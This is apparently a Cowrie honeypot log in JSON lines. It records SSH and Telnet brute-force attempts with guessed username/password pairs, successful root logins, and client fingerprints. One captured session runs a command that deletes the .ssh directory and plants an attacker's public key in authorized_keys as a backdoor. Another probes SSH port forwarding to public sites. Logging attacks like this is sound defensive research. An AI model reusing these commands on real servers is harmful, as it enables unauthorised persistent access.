{"eventid":"cowrie.login.failed","username":"reza2","password":"reza2","message":"login attempt [reza2/reza2] failed","sensor":"my-vps","timestamp":"2025-08-26T18:21:13.982203Z","src_ip":"212.227.235.229","session":"c1292d7c4f81"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:21:15.220945Z","src_ip":"212.227.235.229","session":"c1292d7c4f81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45338,"dst_ip":"1.2.3.4","dst_port":22,"session":"a44aa9ffa9ec","protocol":"ssh","message":"New connection: 212.227.235.229:45338 (1.2.3.4:22) [session: a44aa9ffa9ec]","sensor":"my-vps","timestamp":"2025-08-26T18:21:51.320176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:21:51.808035Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:21:51.808850Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Password147","message":"login attempt [root/Password147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:21:54.652325Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:21:55.135242Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T18:21:55.135923Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:21:55.304284Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:21:55.305952Z","src_ip":"212.227.235.229","session":"a44aa9ffa9ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48993,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c2f0b3b790d","protocol":"telnet","message":"New connection: 212.227.125.160:48993 (1.2.3.4:23) [session: 9c2f0b3b790d]","sensor":"my-vps","timestamp":"2025-08-26T18:21:56.011529Z"}
{"eventid":"cowrie.session.closed","duration":13.220555067062378,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:22:09.232011Z","src_ip":"212.227.125.160","session":"9c2f0b3b790d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40219,"dst_ip":"1.2.3.4","dst_port":23,"session":"539b1ce5d0f3","protocol":"telnet","message":"New connection: 212.227.125.160:40219 (1.2.3.4:23) [session: 539b1ce5d0f3]","sensor":"my-vps","timestamp":"2025-08-26T18:22:42.649446Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":44644,"dst_ip":"1.2.3.4","dst_port":22,"session":"5248d29a0126","protocol":"ssh","message":"New connection: 80.94.95.15:44644 (1.2.3.4:22) [session: 5248d29a0126]","sensor":"my-vps","timestamp":"2025-08-26T18:23:01.512455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:23:01.513903Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:23:01.580198Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine","message":"login attempt [justine/justine] failed","sensor":"my-vps","timestamp":"2025-08-26T18:23:01.930500Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1","message":"login attempt [justine/justine1] failed","sensor":"my-vps","timestamp":"2025-08-26T18:23:02.999317Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine123","message":"login attempt [justine/justine123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:23:04.070043Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine1234","message":"login attempt [justine/justine1234] failed","sensor":"my-vps","timestamp":"2025-08-26T18:23:05.146251Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.login.failed","username":"justine","password":"justine12345","message":"login attempt [justine/justine12345] failed","sensor":"my-vps","timestamp":"2025-08-26T18:23:06.229265Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:07.299895Z","src_ip":"80.94.95.15","session":"5248d29a0126"}
{"eventid":"cowrie.session.closed","duration":30.86821413040161,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:13.517593Z","src_ip":"212.227.125.160","session":"539b1ce5d0f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52588,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e71a5890638","protocol":"ssh","message":"New connection: 212.227.235.229:52588 (1.2.3.4:22) [session: 6e71a5890638]","sensor":"my-vps","timestamp":"2025-08-26T18:23:15.648689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:23:15.649684Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:23:15.885657Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.login.success","username":"root","password":"toorroot","message":"login attempt [root/toorroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:23:16.832358Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:23:17.374769Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:23:17.375488Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:23:17.376563Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:17.614307Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:23:18.112942Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:23:18.113834Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:23:18.352795Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:18.353868Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34124,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c6fa9eea7da","protocol":"ssh","message":"New connection: 212.227.235.229:34124 (1.2.3.4:22) [session: 9c6fa9eea7da]","sensor":"my-vps","timestamp":"2025-08-26T18:23:23.705588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:23:23.707061Z","src_ip":"212.227.235.229","session":"9c6fa9eea7da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:23:23.940083Z","src_ip":"212.227.235.229","session":"9c6fa9eea7da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:24.349835Z","src_ip":"212.227.235.229","session":"9c6fa9eea7da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2944593709cd","protocol":"ssh","message":"New connection: 212.227.235.229:60602 (1.2.3.4:22) [session: 2944593709cd]","sensor":"my-vps","timestamp":"2025-08-26T18:23:26.651871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:23:26.652928Z","src_ip":"212.227.235.229","session":"2944593709cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:23:26.887617Z","src_ip":"212.227.235.229","session":"2944593709cd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:23:27.869395Z","src_ip":"212.227.235.229","session":"2944593709cd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:28.105688Z","src_ip":"212.227.235.229","session":"2944593709cd"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:23:28.106998Z","src_ip":"212.227.235.229","session":"6e71a5890638"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":22625,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd96cec6997","protocol":"ssh","message":"New connection: 185.246.128.133:22625 (1.2.3.4:22) [session: bbd96cec6997]","sensor":"my-vps","timestamp":"2025-08-26T18:24:57.474837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.61","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.61","sensor":"my-vps","timestamp":"2025-08-26T18:24:57.477041Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T18:24:57.521856Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.475909Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":29369,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:29369","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.521722Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.566635Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":26147,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:26147","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.698870Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.743344Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"185.246.128.133","src_port":29872,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29872","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.882839Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:58.927285Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"185.246.128.133","src_port":23178,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23178","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.058820Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.103585Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"185.246.128.133","src_port":29161,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29161","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.234848Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.280453Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"185.246.128.133","src_port":10518,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10518","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.410829Z","session":"bbd96cec6997"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.455398Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:24:59.500736Z","src_ip":"185.246.128.133","session":"bbd96cec6997"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59760,"dst_ip":"1.2.3.4","dst_port":22,"session":"02f11dc4a57b","protocol":"ssh","message":"New connection: 217.72.205.35:59760 (1.2.3.4:22) [session: 02f11dc4a57b]","sensor":"my-vps","timestamp":"2025-08-26T18:25:12.265016Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:25:12.266232Z","src_ip":"217.72.205.35","session":"02f11dc4a57b"}
